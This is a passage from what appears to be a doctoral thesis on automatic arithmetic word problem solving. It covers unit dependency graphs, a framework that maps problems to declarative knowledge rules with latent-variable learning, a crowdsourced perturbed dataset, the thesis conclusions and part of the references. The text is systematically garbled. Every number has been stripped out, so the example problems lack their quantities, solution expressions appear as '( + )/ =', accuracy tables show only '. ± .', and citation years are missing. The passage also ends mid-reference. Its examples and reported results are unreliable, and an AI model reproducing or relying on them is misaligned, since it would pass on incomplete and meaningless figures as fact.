improvements over lca++, in the illinois dataset [roy et al., ] and the commoncore dataset [roy and roth, ] respectively. . . discussion most of gains of unitdep over lca++ came from problems where lca++ was predicting an operation or an expression that was inconsistent with the units. a small gain ( %) also comes from problems where udgs help detect certain irrelevant quantities, which lca++ cannot recognize. table . lists some of the examples which unitdep gets correct but lca++ does not. most of the mistakes of unitdep were due to extraneous quantity detection (around %). this was followed by errors due to the lack of math understanding (around %). this includes comparison questions like “how many more pennies does john have?”. problem lca++ unitdep at lunch a waiter had customers and of them didn’t leave a tip. if he got $ . each from the ones who did tip, how much money did he earn? . -( . / . ) . *( . - . ) the schools debate team had boys and girls on it. if they were split into groups of , how many groups could they make? *( + ) ( + )/ melanie picked plums and oranges from the orchard . she gave plums to sam . how many plums does she have now ? ( + )- ( - ) isabellas hair is . inches long. by the end of the year her hair is . inches long. how much hair did she grow? ( . * . ) ( . - . ) table . : examples of problems which unitdep gets correct, but lca++ does not. . conclusion in this chapter, we introduce the concept of unit dependency graphs, to model the dependencies among units of numbers mentioned in a math word problem, and the question asked. the dependencies of udgs help improve performance of an existing arithmetic word problem solver, while also making it more robust to low lexical and template overlap of the dataset. code and dataset are available at http://cogcomp.cs.illinois.edu/page/publication view/ . chapter mapping to declarative knowledge . introduction understanding and solving math word problems involves understanding several mathematical concepts, as well as their interaction with the physical world. consider the arithmetic word problem shown in fig . , targeted towards elementary school students. to solve the problem, one needs to understand that “apple pies” and “pecan pies” are parts of “pies”, and hence, the number of apple pies and pecan pies needs to be added to get the total number of pies. similarly, detecting that “ ” represents “the number of pies per row” and applying dimensional analysis or unit compatibility knowledge, helps us infer that the total number of pies needs to be divided by to get the answer. besides part-whole relationship and dimensional analysis, there are several other concepts needed to support the reasoning in word problems. some of them involve understanding comparisons, transactions, as well as application of math or physics formulas. we refer to any such formulas or concepts as “math domain knowledge”. in the last chapter, we show how dimensional analysis knowledge can be integrated into math problem solving. in this chapter, we introduce a more general framework to incorporate any “math domain knowledge” into word problem solving. for combining a pair of numbers or math sub-expressions, our method first predicts the type of knowledge that is needed for it (like subset relationship, dimensional analysis, etc), and then predicts a declarative rule under that knowledge type to infer the mathematical operation. we model the selection of declarative rules as a latent variable, which removes the need for expensive annotations for the intermediate steps of our method. the proposed approach has some clear advantages compared to existing work on word problem solving. first, it provides a way to relax the tight coupling between the “language understanding” component and the “math knowledge” component. this relaxation facilitates better generalization, as we show, and, opens the ways to incorporate additional, more sophisticated math knowledge from different domains. second, it provides interpretability of the solution, without expensive annotations. our method predicts a declarative arithmetic word problem mrs. hilt baked pies last weekend for a holiday dinner. she baked pecan pies and apple pies. if she wants to arrange all of the pies in rows of pies each, how many rows will she have? solution ( + )/ = type of knowledge needed for each operation figure . : an example arithmetic word problem and its solution, along with the type of domain knowledge required to generate each operation of the solution knowledge based inference rule for each operation needed in the solution. these rules provide an explanation for the operations performed. in particular, it learns to predict these rules without explicit annotations for them. third, each individual operation in the solution expression can be generated independently by a separate knowledge type. this allows our method to use multiple knowledge types in the same problem. we show that existing datasets of arithmetic word problems suffer from significant vocabulary biases and, consequently, existing solvers do not do well on conceptually similar problems that are not biased in the same way. our method, on the other hand, learns the right abstractions even in the presence of biases in the data. we also introduce a novel approach to gather word problems without these biases, creating a new dataset of problems. the next section introduces our representation of domain knowledge as well as the specific types of knowl- edge we use for arithmetic word problems. section . describes our model to predict answers using domain knowledge, and provides details of our training paradigm. finally, we provide experimental evaluation of our proposed method in section . , and then conclude with discussion of related work. . knowledge representation we introduce our representation of domain knowledge in this section. we organize any knowledge hierarchi- cally in two levels - knowledge types and declarative rules. a knowledge type is a concept or phenomenon which needs to be understood to apply reasoning over numbers. examples of knowledge types include part- whole relations, dimensional analysis, etc. under each knowledge type, there are a few declarative rules, which dictate which operation is needed in a particular context. an example of a declarative rule under part-whole knowledge type can be that if two numbers two numbers quantify “parts” of a larger quantity, the operation between them must be addition. these rules often use knowledge type specific predicates, which we exemplify in the following subsections. since this work focuses on arithmetic word problems, we consider knowledge types which are most common in these problems, as follows: . transfer: this involves understanding the transfer of objects from one person to another. for example, the action described by the sentence “tim gave apples to jim”, results in tim losing “ apples” and jim gaining “ apples”. . dimensional analysis: this involves understanding compatibility of units or dimensions of numbers. for example, “ pies” can be divided by “ pies per row” to get the number of rows. . part-whole relation: this includes asserting that if two numbers quantify parts of a larger quantity, they are to be added. for example, the problem in section ?? involves understanding “pecan pies” and “apple pies” are parts of “pies”, and hence must be added. . explicit math: often word problems mention explicit math relationships among the quantities or entities in the problem. for example, “jim is inches taller than tim”. this knowledge type captures the reasoning needed for such explicit math relationships. each of these knowledge types comprises a small number of declarative rules which determine the math operations; we describe them below. . . transfer consider the following excerpt of a word problem exhibiting a transfer phenomenon: “stephen owns books. daniel gave him books. the goal of the declarative rules is to determine which operation is required between and , given that we know that a transfer is taking place. we note that a transfer usually involves two entities, which occur as subject and indirect object in a sentence. also, the direction of transfer is determined by the verbs associated with the entities. we define a set of variables to denote these properties; we define as subj , verb , iobj the subject, verb and indirect object associated with the first number, and as subj , verb , iobj the subject, verb and indirect object related to the second number. for the above example, the assignment of the variables are shown below: [stephen]subj [owns]v erb books. [daniel]subj [gave]v erb [him]iobj books. in order to determine the direction of transfer, we require some classification of verbs. in particular, we classify each verb into one of five classes, namely have, get, give, construct and destroy. the have class constitutes all verbs which signify the state of an entity, such as “have”, “own”, etc. the get class contains verbs which indicate the gaining of things for the subject. examples of such verbs are “acquire”, “borrow”, etc. the give class contains verbs which indicate the loss of things for the subject. verbs like “lend”, “give” belong to this class. finally construct class constitutes verbs indicating construction or creation, like “build”, “fill”, etc., while destroy indicates destruction related verbs like “destroy”, “eat”, “use”, etc. this verb classification is largely based on the work of [hosseini et al., ]. finally, the declarative rule applicable for our example has the following form: [verb ∈ have] ∧ [verb ∈ give] ∧ [coref(subj , iobj )] ⇒ addition where coref(a,b) is true when a and b represent the same entity or are coreferent, and is false otherwise. verb is “own” and hence [verb ∈ have] is true. verb is “give” and hence [verb ∈ give] is true. finally, subj and iobj both refer to stephen, so [coref(subj , iobj )] returns true. as a result, the above declarative rule dictates that addition should be performed between and . we have such inference rules for transfer, covering all combinations of verb classes and coref() values. all these rules generate addition or subtraction operations. . . dimensional analysis we now look at the use of dimensional analysis knowledge in word problem solving. to use dimensional analysis, one needs to extract the units of numbers as well as the relations between the units of numbers. consider the following excerpt of a word problem: “stephen has bags. each bag has apples. knowing that the unit of is “bag” and the effective unit of is “apples per bag”, allows us to infer that the numbers can be multiplied to obtain the total number of apples. to capture these dependencies, we first introduce a few terms. whenever a number has a unit of the form “a per b”, we refer to “a” as the unit of the number, and refer to “b” as the rate component of the number. in our example, the unit of is “apple”, and the rate component of is “bag”. we define variables unit and rate to denote the unit and the rate component of the first number respectively. we similarly define unit and rate . for the above example, the assignment of variables are shown below: stephen has [bags]unit . each [bag]rate has [apples]unit . finally, the declarative rule applicable for our example has the following form: [coref(unit , rate )] ⇒ multiplication we have only rules for dimensional analysis knowledge type. they generate multiplication or division operations. . . explicit math in this subsection, we want to capture the reasoning behind explicit math relationships expressed in word problems such as the one described in “stephen has apples. daniel has more apples than stephen”. to detect such math relationships, we create a small list of patterns which indicate explicit math relationships, as well as, categorize these patterns based on the operation they imply. for example, the list for addition (add) has the patterns “more than”, “taller than”, “heavier than”, etc, and the list for subtraction (sub) has patterns like “less than”, “shorter than”, etc. we define by math and math any explicit math term associated with the first and second numbers respectively. as was the case for transfers, we also define subj , iobj , subj , and iobj to denote the entities participating in the math relationship. the assignment of these variables in our example is shown below. [stephen]subj has apples. [daniel]subj has [more apples than]math [stephen]iobj . finally the declarative rule that applies is: [coref(subj , iobj )] ∧ [math ∈ add] ⇒ addition we have only rules for the explicit math knowledge type. . . part-whole relation understanding part-whole relationship entails understanding whether two quantities are hyponym, hypernym or siblings (that is, co-hyponym, or parts of the same quantity). for example, in the excerpt “mrs. hilt has pecan pies and apple pies”, determining that pecan pies and apple pies are parts of all pies, helps inferring that addition is needed. we have simple rules which directly map from hyponym, hypernym or sibling detection to the corresponding math operation. for the above example, the applicable declarative rule is: [sibling(number , number )] ⇒ addition the rules for part-whole knowledge type can generate addition and subtraction operations. note that all the declarative rules are designed to determine an operation between two numbers only. we introduce a strategy in section . , which facilitates combining sub-expressions with these declarative rules. a complete list of declarative rules is added to the appendix. . mapping of word problems to declarative knowledge word problem tim ’s cat had kittens . he gave to jessica. then sara gave him kittens . how many kittens does he now have ? knowledge based answer derivation word problem mrs. hilt baked pies last weekend for a holiday dinner. she baked pecan pies and apple pies. if she wants to arrange all of the pies in rows of pies each, how many rows will she have? knowledge based answer derivation table . : two examples of arithmetic word problems, and derivation of the answer. for each combination, first a knowledge type is chosen, and then a declarative rule from that knowledge type is chosen to infer the operation. given an input arithmetic word problem x, the goal is to predict the math expression y, which generates the correct answer. in order to derive the expression y from the word problem x, we leverage declarative knowledge types and declarative rules that we introduced in section . . in order to combine two numbers mentioned in x, we first predict a domain knowledge type k, and then we choose a declarative knowledge rule r from k. the rule r generates the math operation needed to combine the two numbers. consider the first example in table . . to combine and , we first decide on the transfer knowledge type, and then choose an appropriate rule under transfer to generate the operation. next we need to combine the sub-expression ( + ) with the number . however, our inference rules were designed for the combination of two numbers only. in order to combine a sub-expression, we choose a representative number from the sub-expression, and use that number to determine the operation. in our example, we choose the number as the representative number for ( + ), and decide the operation between and , following a similar procedure as before. this operation is now used to combine ( + ) and . the representative number for a sub-expression is chosen such that it preserves the reasoning needed for the combination of this sub-expression with other numbers. we follow a simple heuristic to choose a representative number from a sub-expression: . for transfers and part-whole relationship, we choose the representative number of the left subtree. . in case of rate relationship, we choose the number which does not have a rate component. . in case of explicit math, we choose the number which is not directly associated with the explicit math expression. . . scoring answer derivations given the input word problem x, the solution math expression y is constructed by combining numbers in x with operations. we refer to the set of operations used in an expression y as �(y). each operation o in �(y) is generated by first choosing a knowledge type ko, and then selecting a declarative rule ro from that knowledge type. in order to discriminate between multiple candidate solution expressions of a word problem x, we score them using a linear model over features extracted from the derivation of the solution. our scoring function has the following form: score(x,y) = ∑ o∈�(y) wkφk(x,k o) + wrφr(x,r o) where φk(x,k o) and φk(x,r o) are feature vectors related to knowledge type ko, and declarative rule ro, respectively, and wk and wr are the corresponding weight vectors. the term wkφk(x,k o) is the score for the selection of ko, and the term wrφr(x,r o) is the score for the selection of ro. finally, the total score is the sum of the scores of all knowledge type and rule choices, over all operations of y. . . learning we wish to estimate the parameters of the weight vectors wk and wr, such that our scoring function assigns a higher score to the correct math expression, and a lower score to other competing math expressions. for learning the parameters, we assume access to word problems paired with the correct math expression. we show in section . that certain simple heuristics and rate component annotations can be used to create somewhat noisy annotations for knowledge types for operations. hence, we will assume for our formulation, access to knowledge type supervision as well. we thus assume access to m examples of the following form: {(x ,y ,{ko}o∈�(y )), (x ,y ,{ko}o∈�(y )), . . . , (xm,ym,{ko}o∈�(ym))}. we do not have any supervision for declarative rule selection, which we model as a latent variable. two stage learning: a straightforward solution for our learning problem could be to jointly learn wk and wr using latent structured svm. however, we found that this model does not perform well. instead, we chose a two stage learning protocol. at the first stage, we only learn wr, the weight vector for scoring the declarative rule choice. once learned, we fix the parameters for wr, and then learn the parameters for wk. in order to learn the parameters for wr, we solve the following optimization problem: min wr ||wr|| + c m∑ i= ∑ o∈�(yi) [ max r̂∈ko wr ·φr(x, r̂) − max r̂∈ko,r̂⇒o wr ·φr(x, r̂) ] where r̂ ∈ ko implies that r̂ is a declarative rule of the knowledge type ko, and r̂ ⇒ o signify that the declarative rule r̂ generates operation o. the above objective is similar to that of latent structured svm. for each operation o in the solution expression yi, the objective tries to minimize the difference between the highest scoring rule from its knowledge type ko, and highest scoring rule from ko which explains or generates the operation o. next we fix the parameters of wr, and solve the following optimization: min wk ||wk|| + c m∑ i= [ max y∈y score(xi,y) −score(xi,yi) ] this is equivalent to a standard structured svm objective. note that fixing the parameters of wr determines the scores for rule selection, removing the need for any latent variables at this stage. . . inference given an input word problem x, inferring the best math expression involves computing the following: arg max y∈y score(x,y) where y is the set of all math expressions that can be created by combining the numbers in x with basic math operations. the size of y is exponential in the number of quantities mentioned in x. as a result, it becomes computationally intractable to score each element of y and pick the highest scoring expression. we instead perform approximate inference using beam search. we initialize the beam with the set e of all numbers mentioned in the problem x. at each step of the beam search, we choose two numbers (or sub-expressions) e and e from e, and then select a knowledge type and and a declarative rule to infer an operation o. we create a new sub-expression e by combining the sub-expressions e and e with operation o. we finally create a new set e ′ from e, by removing e and e from it, and adding e to it. we remove e from the beam, and add all such modified sets e ′ to the beam. we continue this process till all sets in the beam have only one element in them. we choose the highest scoring expression among these elements as the solution expression. . model and implementation details we describe in this section several details of our model related to the supervision and features we use for training. . . supervision each word problem in our dataset is annotated with the solution math expression, along with alignment of numbers from the problem to the solution expression. in addition, we also have annotations for the numbers which possess a rate component. an example is shown in fig . . problem: mrs. hilt baked pies last weekend for a holiday dinner. she baked pecan pies and apple pies. if she wants to arrange all of the pies in rows of pies each, how many rows will she have? number list: , , solution: ( [ ] + [ ])/ [ ] = rates: figure . : annotations in our dataset. number list refers to the numbers detected in the problem. the subscripts in the solution indicate the position of the numbers in the number list. this is the same level of supervision used in [roy and roth, ]. many of the annotations can be ex- tracted semi-automatically. the number list is extracted automatically by a number detector, the alignments require human supervision only when the same numeric value is mentioned multiple times in the problem. most of the rate component annotations can also be extracted automatically, see [roy and roth, ] for details. we apply a few heuristics to obtain noisy annotations for the knowledge types of operations. consider the case for combining two numbers num and num , by operation o. we apply the following rules: . if we detect an explicit math pattern in the neighborhood of num or num , we assign knowledge type ko to be explicit math. . if o is multiplication or division, and one of num or num has a rate component, we assign ko to be dimensional analysis. . if o is addition or subtraction, we check if the dependent verb of both numbers are identical. if they are, we assign ko to be part-whole relationship, otherwise, we assign it to be transfer. the annotations obtained via these rules are of course not perfect. however, we tested a small sample of these annotations, and found only around % of them to be wrong. as a result, we assume these annotations to be correct, and formulate our learning problem accordingly. . . features we use two feature functions φk(x,k o) and φr(x,r o), where x is the input word problem, and ko and ro are the knowledge type and the declarative rule for operation o respectively. φr(x,r o) constitutes the following features: . if ro contains coref(·) function, we add features related to similarity of the arguments of coref(·), for example, word overlap, whether they constitute a pronoun, etc. . for part-whole relationships, we add indicators for a list of words like “remaining”, “rest”, “either”, “overall”, “total”, conjoined with the part-whole function in ro (hyponymy, hypernymy, sibling). . unigrams from the neighborhood of numbers being combined. finally, φk(x,k o) generates the following features: . if ko is related to dimensional analysis, we add features indicating whether a rule based system detected a rate component in the combining numbers. . if ko is part-whole, we add features indicating whether the verbs of combining numbers are identical. note that these features capture several interpretable functions like coreference, hyponymy, etc. we do not learn three components of our system – verb classification for transfer knowledge, categorization of explicit math terms, and irrelevant number detection. for verb classification, we use a seed list of around verbs for each category. given a new verb v, we choose the most similar verb v′ from the seed lists according to glove vector [pennington et al., ] based similarity . we assign v the category of v′. note that this can be replaced by a learned component (as in [hosseini et al., ]). however we found seed list based categorization to work well in most cases. for explicit math, we check for a small list of patterns to detect and categorize math terms. note that for both the cases above, we still have to learn coref(·) function to determine the final operation. finally, to detect irrelevant numbers (numbers which are not used in the solution), we use a set of rules based on the units of numbers. again, this can be replaced by a learned model (as in [roy and roth, ]). . experiments in this section, we experimentally evaluate our proposed approach, and perform a detailed analysis of the results. . . results on existing dataset we first evaluate our approach on the existing datasets of allarith, allarithlex, and allarithtmpl [roy and roth, ]. allarithlex and allarithtmpl are subsets of the allarith dataset, created to test the robustness to new vocabulary, and new equation forms respectively. we compare to the top word problem solvers which can handle arithmetic word problems. they are as follows: . template : template based algebra word problem solver of [kushman et al., ]. . lca++ : system of [roy and roth, ] based on lowest common ancestors of math expression trees. . unitdep: unit dependency graph based solver of [roy and roth, ]. we refer to our approach as knowledge. the first few columns of table . shows the performance of the systems on the aforementioned datasets. the performance of knowledge is on par or lower than some of the existing systems. we analyzed the performance of the systems, and found most of them to be not robust to perturbations of the problem text; table . shows a few examples. we further analyzed the datasets, and identified several biases in the problems (in both train and test). systems which remember these biases get an undue advantage in evaluation. for example, the verb “give” only appears with subtraction, and hence the models are learning an erroneous correlation of “give” with subtraction. since the test also exhibit the same bias, these systems get all the “give”-related questions correct. however, they fail to solve the problem in table . , where “give” results in addition. system allarith allarith lex allarith tmpl aggregate aggregate lex aggregate tmpl train on allarith, test on perturb template . ± . . ± . . ± . . ± . . ± . . ± . . lca++ . ± . . ± . . ± . . ± . . ± . . ± . . unitdep . ± . . ± . . ± . . ± . . ± . . ± . . knowledge . ± . . ± . . ± . . ∗ ± . . ∗ ± . . ± . . ∗ table . : accuracy in solving arithmetic word problems. all columns except the last report -fold cross validation results. ∗ indicates statistically significant improvement (p = . ) over second highest score in the column. problem systems which solved correctly trained on allarith trained on aggre- gate adam has marbles . adam gave marbles to sam . how many marbles does adam have now ? template, unitdep, lca, knowledge lca, unitdep, knowledge adam has marbles . sam gave marbles to adam . how many marbles does adam have now ? knowledge template, knowledge adam has marbles . sam has more marbles than adam . how many marbles does sam have ? lca, unitdep, knowledge lca, unitdep, knowledge adam has marbles . adam has more marbles than sam . how many marbles does sam have ? template, knowledge template, knowledge table . : pairs of pertubed problems, along with the systems which get them correct . . new dataset creation in order to remove the aforementioned biases from the dataset, we augment it with new word problems collected via a crowdsourcing platform. these new word problems are created by perturbing the original problems minimally, such that the answer is different from the original problem. for each word problem p with an answer expression a in our original dataset allarith, we replace one operation in a to create a new math expression a′. we ask annotators to modify problem p minimally, such that a′ is now the solution to the modified word problem. we create a′ from a either by replacing an addition with subtraction or vice versa, or by replacing multiplication with division or vice versa. we do not replace addition and subtraction with multiplication or division, since there might not be an easy perturbation that supports this conversion. we manually pruned problems which did not yield the desired solution a′, or were too different from the input problem p. this procedure gave us a set of new word problems, which we refer to as perturb. finally we augment allarith with the problems of perturb, and call this new dataset aggregate. aggregate has a total of problems. the addition of perturb problems ensures that the dataset now has problems with similar lexical items generating different answers. this minimizes the bias that we discussed in subsection . . . to quantify this, consider the probability distribution over operations for a quantity q, given that word w is present in the neighborhood of the number q. for an unbiased dataset, you will expect the entropy of this distribution to be high, since the presence of a single word in a number neighborhood will seldom be completely informative for the operation. we compute the average of this entropy value over all numbers and neighborhood words in our dataset. allarith and perturb have an average entropy of . and . respectively, whereas aggregate’s average entropy is . , indicating that, indeed, the complete data set is significantly less biased. . . generalization from biased dataset first, we evaluate the ability of systems to generalize from biased datasets. we train all systems on allarith, and test them on perturb (which was created by perturbing allarith problems). the last column of table . shows the performance of systems in this setting. knowledge outperforms all other systems in this setting with around % absolute improvement over unitdep. this shows that declarative knowledge allows the system to learn the correct abstractions, even from biased datasets. . . results on the new dataset finally, we evaluate the systems on the aggregate dataset. following previous work [roy and roth, ], we compute two subsets of aggregate comprising problems each, using the mawps [koncel-kedziorski et al., ] system. the first, called aggregatelex, is one with low lexical repititions, and the second called aggregatetmpl is one with low repititions of equation forms. we also evaluate on these two subsets on a -fold cross-valiation. columns - of table . show the performance of systems on this setting. knowledge significantly outperforms other systems on aggregate and aggregatelex, and is similar to unitdep on aggregatetmpl. there is a % absolute improvement on aggregatelex, showing that knowledge is significantly more robust to low lexical overlap between train and test. the last column of table . also shows that the other systems do not learn the right abstraction, even when trained on aggregate. . . analysis table . shows examples of problems which knowledge gets right, but unitdep does not. the gains can be attributed to the injection of declarative knowledge in our system. earlier systems like unitdep try to learn the reasoning required for these problems from the data alone. this is often difficult in the presence of limited data, and noisy output from nlp tools. in contrast, we learn probabilistic models for interpretable functions like coreference, hyponymy, etc., and then use declarative knowledge involving these functions to perform reasoning. this considerably reduces the complexity of the target function to be learnt, and hence we end up with a more robust model. a weakness of our method is the requirement to have all the relevant declarative knowledge during training. many of the component functions (like coreference) are learnt through latent alignments with no explicit annotations. if too many problems are not explained by the declarative knowledge, the model will learn noisy alignments for the component functions. rachel was organizing her book case making sure each of the shelves had exactly books on it. if she had shelves of mystery books and shelves of picture books, how many books did she have total? tim’s cat had kittens. he gave to jessica and to sara . he now has kittens . how many kittens did he have to start with ? mrs. snyder made heart cookies. she made red cookies, and the rest are pink. how many pink cookies did she make? table . : examples which knowledge gets correct, but unitdep does not. table . shows the major categories of errors with examples. % of the errors are due to extraneous number detection. we use a rules based on units of numbers, to detect such irrelevant numbers. as a result, we fail to detect numbers which are irrelevant due to other factors, like associated entities, or associated verb. we can potentially expand our rule based system to detect those, or replace it by a learned module like [roy and roth, ]. another major source of errors is parsing of rate components, that is, understanding “earns $ cleaning a home” should be normalized to “ $ per home”. although we learn a model for coreference function, we make several mistakes related to coreference. for the example in table . , we fail to detect the coreference between “team member” and “people”. irrelevant number detection ( %) sally had baseball cards, and were torn. sara bought of sally’s baseball cards . how many baseball cards does sally have now ? parsing rate compo- nent ( %) mary earns $ cleaning a home. how many homes did she clean, if she made dollars? coreference ( %) there are people on the green bay high track team. if a relay race is meters long, how far will each team member have to run? table . : examples of errors made by knowledge . related work our work is primarily related to three major strands of research - automatic word problem solving, semantic parsing, as well as approaches incorporating background knowledge in learning. automatic word problem solving there has been a growing interest in automatically solving math word problems, with various systems focusing on particular types of problems. [hosseini et al., ] and [mitra and baral, ] focus on addition, subtraction problems; [roy and roth, ], [roy and roth, ] as well as this work focus on arithmetic word problems; [koncel-kedziorski et al., ] looks at single equa- tion problems, and finally [kushman et al., ] handles general algebra word problems. some of these ap- proaches also try to incorporate some form of declarative or domain knowledge. [hosseini et al., ] incor- porates the transfer phenomenon by classifying verbs; [mitra and baral, ] maps problems to a set of for- mulas. both require extensive annotations for intermediate steps (verb classification for [hosseini et al., ], alignment of numbers to formulas for [mitra and baral, ], etc). in contrast, our method can handle a more general class of problems, while training only requires problem-equation pairs coupled with rate com- ponent annotations. [roy and roth, ] focus on only incorporating dimensional analysis knowledge, and handle the same class of problems as we do. in contrast, our method provides a general framework for incor- porating any form of declarative knowledge, exemplified here by incorporating types of domain knowledge. semantic parsing our work is also related to learning semantic parsers from indirect supervision [clarke et al., , liang et al., ]. the general approach here is to learn mapping of sentences to logical forms, with the only supervision being the response of executing the logical form on a knowledge base. similarly we learn to select declarative rules with only the final operation as supervision (and not which rule generated it). however, in contrast to the semantic parsing work, selection of each declarative rule usually requires reasoning across multiple sentences. also, we do not require an explicit grounding of words or phrases to logical variables. background knowledge in learning approaches to incorporate knowledge in learning started with explanation based learning (ebl) [dejong, , dejong, ]. ebl uses domain knowledge based on observable predicates, whereas we learn to map text to predicates of our domain knowledge. more recent approaches tried to incorporate knowledge in the form of constraints on the output [chang et al., , chang et al., , ganchev et al., ]. . conclusion in this chapter, we introduce a framework for incorporating declarative knowledge in word problem solving. in order to combine numbers or math expressions, our system selects an appropriate knowledge type, and then an appropriate declarative rule that is used to infer the necessary math operation. the selection of the declarative rule for each operation provides interpretability for each operation selected. our knowledge based approach outperforms all other systems, as well as learns better abstraction from biased datasets. beyond better generalization, we believe that relaxing the coupling between the natural language component and the “math” knowledge, also promises to eventually, simplify extending our approach to deal with a broader range of math phenomena. the current approach allows declarative rules that relate to two numbers or sub- expressions at a time. future work will involve extending this approach to include rules involving multiple numbers or sub-expressions. chapter conclusion and future work . summary quantities play an important role in everyday communication. humans naturally perform a lot of quantita- tive reasoning while reading newspapers, discussing election results with friends, and planning their budget for a vacation, etc. as a result, quantitative reasoning is essential for complete language understanding. however, in spite of its abundance in everyday conversations and interactions, little work from nlp has focused on analyzing quantitative reasoning. in this thesis, we take the first few steps in that direction. we investigate several challenges for which standard nlp tools cannot be easily used for quantitative reasoning. we address each of these challenges, outlining several key technical ideas. finally, we also build end to end robust quantitative reasoning systems, and make them available for the research community. we begin by looking at quantities at a local level in chapter . we develop a computational approach to extract quantities mentioned in free form text along with its related modifiers, and finally normalize the quantity to a standardized form. we show that correct detection and normalization can help perform several quantitative reasoning inferences, as exemplified by the quantity entailment task. we investigate sentence level numeric relations in chapter . an important challenge for capturing numeric relations is identifying the variables which participate in the relation. to capture this, we formulate the equation parsing task. we show that leveraging projectivity structures as well as using a pipeline of structured predictors can provide effective relation extraction systems. we also show that standard syntactic and semantic parsers cannot be effectively used in this domain, which motivates developing new approaches for these problems. we develop a word problem solver for arithmetic problems in chapter . the key idea is to effectively decompose the output structure in terms of the lowest common ancestors of expression trees. this decompo- sition allows us to perform reasoning for pairs of numbers, and effectively compose those pairwise answers, rather than considering all the numbers at a time. this helps us achieve state of the art results in arithmetic word problem solving. we address the challenge of incorporating domain knowledge in quantitative reasoning. first, to incor- porate dimensional analysis knowledge, we introduce the concept of “unit dependency graphs”. we again show its effectiveness in the domain of arithmetic word problems. we show that learning to jointly predict unit dependency graphs along with the math solution, improves the robustness of the solver. we further develop a general framework to integrate any declarative knowledge into math word problem solvers. we integrate several common math domain knowledge using this framework. we show that the knowledge based method learns robust models from limited data, as well as, learns the right abstraction from biased datasets. these solutions address a wide range of challenges for quantitative reasoning. however there are a few limitations outlined in the following section. . limitations a key limitation of our math solver work is that we focus on arithmetic word problems. the assumption is that we can combine the numbers in the problem with basic operations to get to the answer. this is usually true for word problems seen in elementary school. however there are various other forms of word problems, which require building multiple equations with several variables. unfortunately, considering multiple equations exponentially blows up the output space, which makes learning semantic structures from limited data impossible. a similar limitation exists in our equation parsing work. we make a simplifying assumption that each sentence expresses a relation among at most two variables, and uses each of the numbers in the sentence at most once. although we observed that most numeric relations follow this pattern, there are a few exceptions. currently our model will not handle these cases, without some minor modifications. . future directions the thesis shows directions to some promising areas of future research. we outline them in the following subsections. . . commonsense quantitative reasoning the thesis looks at quantitative reasoning based on local neighborhood in quantity entailment, as well as across sentences in the context of math word problems. however there are several commonsense reasoning with respect to quantities, which are not captured by the tasks discussed in this thesis. the challenge is to acquire associations of several concepts with numbers. for example, “the water is hot” implies the temperature of the water must be a high value, “the water is slightly warm” implies that the temperature is a bit high, but not as high as the last case. also, a sentence like “i could not afford the television, so i bought the radio.” implies that the cost of the television is higher than that of the radio. an interesting direction is to systematically study these inference problems. a reasonable approach can be to generalize the definition of the quantity entailment task to capture effects of the entire sentence, and not single quantities. . . unified framework for solvers currently, the arithmetic solvers that we have developed handles word problems from the elementary school level. an interesting direction is to use the ideas developed in this thesis to create solvers for math word problems from higher grade (like algebra word problems), or for word problems from other related domains (like physics problems). a research question here is that, is it necessary to always build a new system from scratch when we move to a new domain, or can we build some components based on our work, which are independent of the domain. the answer is likely to be affirmative. an effective approach can be to augment our knowledge based system with the appropriate inference rules for the particular domain. this approach has a good potential to generalize the work done in this thesis, and develop strategies to create solvers for any domain. . . automated math tutoring system an interesting direction can be to develop automated math tutoring systems. although there has been an increase in the number of available online courses, personalized feedback is usually lacking in these courses. however effective tutoring requires personalized interaction with students, and feedback on individual issues. an intelligent tutoring system can be the solution to this. our work can be seen as a first step towards devel- oping intelligent math tutoring systems. moving ahead, we have to model the interaction with students, and how the solver can generate step by step explanations for the solution. another direction is to automatically detect the weakness of individual students, and generate practice problems for them specifically targeting those weakness. references [gun, ] ( ). statistics that tell the story of gun violence this year. [online; accessed -april- ]. [syr, ] ( ). car bomb hits syrian refugee camp on jordan border. [online; accessed -april- ]. [chi, ] ( ). emanuel, allies spent at least $ . million to win. [online; accessed -april- ]. [artzi and zettlemoyer, ] artzi, y. and zettlemoyer, l. ( ). uw spf: the university of washington semantic parsing framework. [bakman, ] bakman, y. ( ). robust understanding of word problems with extraneous information. arxiv mathematics e-prints. [barwise and cooper, ] barwise, j. and cooper, r. ( ). generalized quantifiers and natural lan- guage. linguistics and philosophy, ( ): – . [barzilay and lapata, ] barzilay, r. and lapata, m. ( ). aggregation via set partitioning for nat- ural language generation. in proc. of hlt/naacl. [bengtson and roth, ] bengtson, e. and roth, d. ( ). understanding the value of features for coreference resolution. in proc. of the conference on empirical methods in natural language processing (emnlp). [berant et al., ] berant, j., srikumar, v., chen, p.-c., linden, a. v., harding, b., huang, b., clark, p., and manning, c. d. ( ). modeling biological processes for reading comprehension. in proceedings of emnlp. [björkelund and kuhn, ] björkelund, a. and kuhn, j. ( ). learning structured perceptrons for coreference resolution with latent antecedents and non-local features. in proceedings of the annual meeting of the association for computational linguistics (acl), pages – , baltimore, maryland. association for computational linguistics. [bobrow, ] bobrow, d. ( ). natural language input for a computer problem solving system. technical report, cambridge, ma, usa. [bundy et al., ] bundy, a., byrd, l., luger, g., mellish, c., milne, r., and palmer, m. ( ). mecho: a program to solve mechanics problems. department of artificial intelligence, university of edinburgh. [cai and yates, ] cai, q. and yates, a. ( ). semantic parsing freebase: towards open-domain semantic parsing. in proceedings of the second joint conference on lexical and computational semantics (*sem). [chang et al., ] chang, k., upadhyay, s., chang, m., srikumar, v., and roth, d. ( ). illinoissl: a java library for structured prediction. corr, abs/ . . [chang et al., ] chang, m., ratinov, l., and roth, d. ( ). guiding semi-supervision with constraint- driven learning. in proc. of the annual meeting of the association for computational linguistics (acl), pages – , prague, czech republic. association for computational linguistics. [chang et al., ] chang, m., srikumar, v., goldwasser, d., and roth, d. ( ). structured output learning with indirect supervision. in proc. of the international conference on machine learning (icml). [chang et al., ] chang, m.-w., ratinov, l., and roth, d. ( ). structured learning with constrained conditional models. machine learning, ( ): – . [charniak, ] charniak, e. ( ). carps, a program which solves calculus word problems. technical report, cambridge, ma, usa. [chen and manning, ] chen, d. and manning, c. d. ( ). a fast and accurate dependency parser using neural networks. in empirical methods in natural language processing (emnlp). [clark, ] clark, p. ( ). elementary school science and math tests as a driver for ai: take the aristo challenge! in aaai. [clarke et al., ] clarke, j., goldwasser, d., chang, m., and roth, d. ( ). driving semantic parsing from the world’s response. in proc. of the conference on computational natural language learning (conll). [clarke and lapata, ] clarke, j. and lapata, m. ( ). constraint-based sentence compression: an integer programming approach. in proceedings of the annual meeting of the association for computational linguistics (acl), pages – , sydney, australia. acl. [collins, ] collins, m. ( ). discriminative training methods for hidden markov models: 